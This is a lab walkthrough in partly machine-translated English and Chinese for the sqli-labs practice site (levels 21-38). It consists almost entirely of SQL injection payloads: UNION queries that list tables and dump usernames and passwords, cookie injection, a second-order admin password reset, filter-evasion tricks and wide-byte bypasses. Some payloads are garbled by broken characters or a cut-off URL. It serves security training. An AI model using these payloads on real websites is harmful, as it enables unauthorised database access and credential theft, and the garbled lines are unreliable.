sql injection basic statement:
order by 4
判断有多少列
union select 1,2,3
判断数据显示点
union select 1,user(),database()
显示出登录用户和数据库名
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3
查看数据库有哪些表
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3
查看对应表有哪些列
union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3
查看账号密码信息
Page-2 (Advanced Injections) advanced injection less21-38
based on less-21-- ') Cookie injection of character
A first normal landing into the following pages
Second, the use Burp Suite capture the current page.
Third, the selected portion of the module into the Repeater Ctrl + B Base64 encoding of
injection statement:
') union select 1,2,3#
编码后:JykgdW5pb24gc2VsZWN0IDEsMiwzIyA=
Fourth, the normal display, then I believe you know how to do it
less-22-- based "character of the injection Cookie
Injection statement:
uname=" union select 1,2,3# ;
Steps above
less-23-- filter type injection GET annotated
Injection statement:
id=-1' union select 1,2,3 ='1
less-24-- secondary injection
Assume to know but do not know the password admin user
first clicksNew User click here?Registration admin '- - user
and then log on the user to change the password
and then enter just use admin admin' - - Modify password
login is successful, then the same password for two accounts
or less-25-- filtered and injection and single quotes
Injection statement:
id=-1' union select 1,2,3--
or less-25a-- and filtered and numeric injection
Injection statement:
id=-1 union select 1,2,3--
less-26-- character-based single quotes and filtered injection annotations whitespace
Injection statement:
id=-1'aandnd(updatexml(1,'~aaaa',1))anandd'1'='1
based on less-26a-- ') filtering the comments and character spaces blind
Here we do not complain, but added an extra brackets.
less-27-- 'based on the injection character filtering union, select annotations and spaces
Injection statement:
id=1'and(updatexml(1,'~aaaa',1))and'1'='1
less-27a-- based on the "select character and filtered union blinds
Single quotes into double quotes, as above.
based on less-28-- ') filtering the injection character and select other union
Injection statement:
网址栏url后
http://localhost/sqli-labs-master/Less-28/?id=111%27)%0AUnIon%0AAll%0ASelect%0A(%271%27),2,(%273
url
转码前
id=111') UnIon All Select ('1'),2,('3
based on less-28a-- ') character filtered union, select blinds and spaces
Injection statement:
网址栏url后
http://localhost/sqli-labs-master/Less-28a/?id=-1%27)%0AUnIon%0AAll%0ASelect%0A1,2,3%0A--%20-
url转码前
id=-1') UnIon All Select 1,2,3 -- -
less-29 index.php-- single quote character based on injection
Injection statement:
id=-1' union select 1,2,3 -- -
less-29 login.php-- hidden off parameter based contamination bypass single quotes
Injection statement:
id=1&id=-1' union select 1,2,3 -- -
less-30 index.php-- double quote character based on the injection of
Injection statement:
id=-1" union select 1,2,3 -- -
less-30 login.php-- hidden off based on the parameters in double quotes contamination bypass
Injection statement:
id=1&id=-1" union select 1,2,3 -- -
less-31-- based ") injection of character
Injection statement:
id=-1") union select 1,2,3 -- -
less-31 login.php-- hidden off parameter based contamination ") bypass
Injection statement:
id=1&id=-1") union select 1,2,3 -- -
injection byte width less-32--
Injection statement:
id=-1%df' union select 1,2,3 -- -
less-33 - get byte wide mode injection
Injection statements in the URL field, enter:
id=-1%df%27%20union%20select%201,2,3%20--%20-
less-34 - post injection mode byte wide
Injection statement:
Dumb�' union select 1,2,3 --
less-35-- numeric injection
Injection statement:
id=-1 union select 1,2,3
injection byte width less-36--
Injection statement:
id=-1�' union select 1,2,3 -- -
less-37-- byte wide post injection
Injection statement:
Dumb�' union select 1,2 --
less-38-- byte wide post injection
Injection statement:
id=-1�' union select 1,2,3 -- -
id=-1�' union select 1,2,3 -- -